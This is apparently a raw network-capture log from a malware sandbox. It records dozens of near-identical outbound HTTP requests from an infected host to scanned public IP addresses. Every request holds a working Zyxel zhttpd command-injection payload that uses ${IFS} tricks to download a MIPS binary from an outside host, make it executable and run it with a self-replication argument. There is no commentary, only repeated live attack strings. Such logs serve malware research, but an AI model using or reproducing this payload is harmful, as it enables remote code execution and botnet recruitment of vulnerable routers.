                                                        Jan 28, 2024 10:13:03.612989902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192192.168.2.14428041.132.54.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613017082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7193192.168.2.143396439.144.43.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613071918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7194192.168.2.145295078.82.194.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613105059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7195192.168.2.1436534221.139.198.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613140106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7196192.168.2.143358631.251.143.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613162041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7197192.168.2.143808871.67.229.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613205910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7198192.168.2.145894631.181.42.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613261938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7199192.168.2.1451748193.25.91.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613282919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7200192.168.2.14512502.105.255.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613312006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7201192.168.2.1437952142.250.109.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613360882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7202192.168.2.1455808194.149.81.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613406897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7203192.168.2.144243079.138.60.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613441944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7204192.168.2.143972814.155.181.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613476038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7205192.168.2.1443756188.76.235.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613532066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7206192.168.2.144329850.169.215.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613555908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7207192.168.2.1452240169.136.83.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613605976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7208192.168.2.1438814184.204.242.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613643885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7209192.168.2.1454858174.80.37.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613696098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7210192.168.2.144303446.105.162.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613734007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7211192.168.2.145064680.107.21.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613770962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7212192.168.2.1445092165.56.10.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613810062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7213192.168.2.1460882124.222.8.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613848925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7214192.168.2.1458248187.212.137.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613878012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7215192.168.2.1443136118.7.237.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613924980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7216192.168.2.145976831.246.172.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.613955975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7217192.168.2.1460418104.77.178.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614007950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7218192.168.2.1459720146.127.179.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614027977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7219192.168.2.1451260197.231.179.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614063978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7220192.168.2.144067638.105.110.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614109993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7221192.168.2.144547235.160.82.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614131927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7222192.168.2.1450132109.162.89.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614171028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7223192.168.2.1439748159.63.244.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614216089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7224192.168.2.1448948160.53.231.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614248991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7225192.168.2.1442372141.138.96.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614285946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7226192.168.2.1459702200.64.236.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614308119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7227192.168.2.14351345.217.132.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614370108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7228192.168.2.144138225.80.30.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614394903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7229192.168.2.146024065.233.46.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614429951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7230192.168.2.1435402193.212.230.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614464998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7231192.168.2.1443848200.85.189.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614520073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7232192.168.2.1434078186.35.153.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614562035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7233192.168.2.1458478212.182.119.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614572048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7234192.168.2.1453260143.168.173.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614610910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7235192.168.2.143873887.19.72.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614662886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7236192.168.2.1443752126.155.96.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614701986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7237192.168.2.1445606189.46.240.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614729881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7238192.168.2.1441186163.150.254.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614787102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7239192.168.2.1460880142.126.58.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614820957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7240192.168.2.1437760163.86.61.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614856958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7241192.168.2.143530612.18.213.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614892006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7242192.168.2.14437284.102.103.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614968061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7243192.168.2.143915041.176.124.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.614995956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7244192.168.2.145123850.137.110.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615027905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7245192.168.2.1450152167.165.59.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615062952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7246192.168.2.145328425.40.93.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615097046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7247192.168.2.1459034206.21.203.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615154028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7248192.168.2.145886412.188.141.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615185976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7249192.168.2.1436804112.119.34.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615231991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7250192.168.2.144476099.195.170.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615257978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7251192.168.2.1460554184.73.167.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.615302086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7252192.168.2.145046069.58.132.251443
                                                        TimestampBytes transferredDirectionData
